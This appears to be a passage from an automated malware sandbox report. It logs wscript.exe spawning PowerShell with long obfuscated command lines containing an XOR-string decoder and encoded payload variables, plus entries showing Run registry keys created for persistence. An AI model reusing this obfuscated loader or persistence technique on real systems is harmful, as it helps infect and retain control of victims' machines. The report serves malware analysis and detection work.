            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB044E2314 pushad ; iretd
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04458C72 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E629 push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E62B push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E62F push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750E5E7 push ss; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750EBA8 push ebp; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750EA58 push edx; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750D1F8 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0750D1AB push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07505810 push es; ret
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07517E70 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00B78A5F push edi; retn 0000h

            Boot Survival

            barindex
            Creates multiple autostart registry keys
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttractantJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HugiJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HugiJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HugiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttractantJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttractantJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
